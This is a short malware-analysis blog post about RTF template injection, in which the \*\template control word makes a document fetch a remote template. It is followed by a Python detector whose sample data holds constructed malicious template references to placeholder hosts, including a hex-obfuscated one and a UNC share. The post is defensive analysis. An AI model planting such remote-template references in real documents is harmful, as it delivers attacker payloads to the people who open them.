RTF template injection
This post was authored by Fareed.
Based on automated analysis, this RTF file communicates with a DNS name, but unfortunately that name now resolves to 127.0.0.1.
Knowing that the RTF file made a request to an external host, our analyst began investigating it in a text editor, looking for any string related to that DNS name; it is found at line 14, as shown below:
According to http://ftp.artifax.net/ArtRep/2.0/Help/rtf.htm, the control word "\*\template" is described as: "Destination; the argument is the name of a related template file; it must be enclosed in braces. This is a destination control word."
From this description we can see that the control word can be abused for template injection, which is exactly what the attacker did here.
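As an added example (not code from the original post), a small Python scanner that pulls every `\*\template` destination out of an RTF file, decoding `\'hh` hex escapes so an obfuscated host is still recovered, and flags targets that point at another host. The sample RTF and its hostnames are constructed placeholders.

```python
import re

# Constructed sample RTF (not from the original post): a minimal document with
# three \*\template destinations: one plain, one hex-escaped, one UNC path.
# Hostnames are placeholders.
SAMPLE_RTF = (
    rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}"
    rb"{\*\template http://remote.example/payload.dotm}"
    rb"{\*\template \'68ttp://\'61nother.example/x}"
    rb"{\*\template \\\\fileshare.example\\tpl\\t.dotm}"
    rb"\pard Hello, world.\par}"
)

# Start of a template destination group: {\*\template
TEMPLATE_GROUP = re.compile(rb"\{\\\*\\template\b")

# RTF tokens inside the destination: \'hh hex escapes, escaped \\ \{ \},
# control words (optional numeric parameter and delimiting space),
# other control symbols, and stray braces.
TOKEN = re.compile(rb"\\'([0-9a-fA-F]{2})|\\([\\{}])|\\[a-zA-Z]+-?\d* ?|\\.|[{}]")

def _group_body(data: bytes, start: int) -> bytes:
    """Return the contents of the brace group that opens at data[start]."""
    depth = 0
    for i in range(start, len(data)):
        if data[i:i + 1] == b"{":
            depth += 1
        elif data[i:i + 1] == b"}":
            depth -= 1
            if depth == 0:
                return data[start + 1:i]
    return data[start + 1:]  # unbalanced file: take everything to the end

def _decode(raw: bytes) -> str:
    """Resolve hex escapes, keep escaped literals, drop control words."""
    def sub(m: re.Match) -> bytes:
        if m.group(1):
            return bytes([int(m.group(1), 16)])
        if m.group(2):
            return m.group(2)
        return b""
    return TOKEN.sub(sub, raw).decode("latin-1").strip()

def find_template_targets(data: bytes) -> list[str]:
    """Every decoded \\*\\template destination in an RTF byte string."""
    return [t for m in TEMPLATE_GROUP.finditer(data)
            if (t := _decode(_group_body(data, m.start())))]

def is_remote(target: str) -> bool:
    """True when the template would be fetched from another host."""
    t = target.lower()
    return t.startswith(("http://", "https://", "ftp://", "\\\\", "//"))
```

Any document where `find_template_targets` returns a remote target is worth pulling aside for a closer look, since a legitimate template reference rarely points outside the local machine.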